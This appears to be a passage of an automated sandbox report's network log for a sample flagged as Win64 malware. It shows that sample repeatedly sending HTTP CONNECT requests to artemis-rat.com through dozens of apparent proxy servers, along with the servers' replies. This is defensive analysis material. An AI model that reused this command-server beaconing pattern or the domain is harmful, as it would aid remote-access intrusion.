                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              250192.168.2.450572103.118.47.24380807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.021233082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              251192.168.2.44982837.187.77.58379207284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.023813963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              252192.168.2.450775198.12.255.193532817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.025310993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.553673029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.204369068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              253192.168.2.45062731.211.130.23781927284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.029572964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              254192.168.2.45069568.1.210.16341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.049187899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              255192.168.2.450676121.159.146.251807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.050009012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              256192.168.2.450729159.203.61.16980807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.052172899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.180834055 CET28INHTTP/1.1 400 Bad Request


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              257192.168.2.45059191.202.230.21980807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.053149939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.776176929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.834930897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              258192.168.2.450834162.241.46.54583307284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.056025028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              259192.168.2.44988672.195.34.4241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.063070059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              260192.168.2.450382117.160.250.13288997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.071832895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.652345896 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              261192.168.2.45080792.204.136.149251377284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.073139906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.631815910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.335074902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.858541012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.741415977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.660013914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.471421957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.101900101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.326889992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              262192.168.2.45058662.171.133.6631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.083924055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.887331009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.571584940 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              263192.168.2.45063737.156.146.16331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.087968111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.866178989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.022486925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.366976976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.069639921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.866517067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.524589062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.841485977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:04.335062027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              264192.168.2.450885132.148.16.169113207284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.088668108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.538048983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.038100958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.038083076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.070094109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              265192.168.2.450711147.75.34.86100007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.089742899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.391236067 CET65INHTTP/1.1 200 Connection Established
                                              Proxy-Agent: Zscaler/6.3


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              266192.168.2.449806117.160.250.16399907284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.100399017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.600761890 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              267192.168.2.450532102.132.50.680807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.101294994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              268192.168.2.45069477.91.74.77807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.114562988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.450268030 CET129INHTTP/1.1 301 Moved Permanently
                                              Location: https://artemis-rat.com:443
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              269192.168.2.450679103.49.202.252807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.115549088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.488018036 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.14.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              270192.168.2.45079392.205.110.47196007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.119214058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.756792068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.647459984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.422996044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              271192.168.2.45084170.166.167.38577287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.119235039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              272192.168.2.44989361.110.5.2807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.124238014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.745218039 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              273192.168.2.45070647.236.252.2188887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.131433964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              274192.168.2.45088638.162.1.9031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.136049986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.565340996 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
